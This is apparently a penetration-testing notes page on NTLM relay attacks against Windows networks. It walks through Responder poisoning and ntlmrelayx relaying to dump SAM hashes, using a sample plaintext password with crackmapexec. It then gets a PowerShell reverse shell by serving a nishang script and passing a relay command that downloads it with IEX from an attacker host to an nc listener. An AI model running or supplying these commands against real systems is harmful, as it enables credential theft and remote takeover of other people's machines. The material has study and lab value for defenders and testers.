NTLM Relay

Imagine we have a user that is Administrator in other computer. We could use its power to extract the SAM hashes, even execute remote commands.

For example:

Sara Ardila is now Administrator over Carlos Villamizar (computer).

crackmapexec smb 10.10.10.0/24 -u 'sara.ardila' -p 'Sar@91082'

Extract SAM hashes

We need to create a file of targets (in this case PC-CARLOS):

And then, update the Responder.py configuration:

From here https://github.com/lgandx/Responder

sudo python3 Responder/Responder.py -I eth0

Now, execute ntlmrelayx:

python3 ntlmrelayx.py -tf targets.txt -smb2support

So, knowing that Sara is administrator over Carlos, we need to wait for a connection from Sara with a service or task. Using that poisoning on the network, we can trick the connection to travel across the network and end in our Responder, this will lead to take the privileges from the user Sara over Carlos and will do the magic using the ntlmrelayx.py program.

In Responder:

And ntlmrelayx:

And we are dumping SAM hashes, with these we can do Pass-The-Hash.

Execute remote commands

From here https://github.com/samratashok/nishang

cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 .
mv Invoke-PowerShellTcp.ps1 ipst.ps1

Take the line 20:

19 │ .EXAMPLE
20 │ PS > Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444

Copy its content to the bottom of the file and change the values:

Now, serve that file and start a listener in the 4460 port to receive the PowerShell Reverse Shell:

➧ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
➧ nc -lvp 4460
listening on [any] 4460 ...

Now, execute ntlmrelayx:

python3 ntlmrelayx.py -tf targets.txt -smb2support -c "powershell IEX(New-Object Net.WebClient).downloadString('http://172.16.200.7:8000/ipst.ps1')"

With this, we are reaching the file in our server and importing its content, as we have the last line uncommented, that line will be executed after being imported.

Now, start our Responder (remember, with SMB and HTTP Off):

sudo python3 Responder/Responder.py -I eth0

Wait for the connection from Sara to a invalid or down service/task/folder:

In our listener:

We are inside CarlosPC exploiting the privilege from Sara in CarlosPC :O

PreviousSMB Relay (LLNMR, NTB-NS & WPAD)NextTools to exploit AD things

Last updated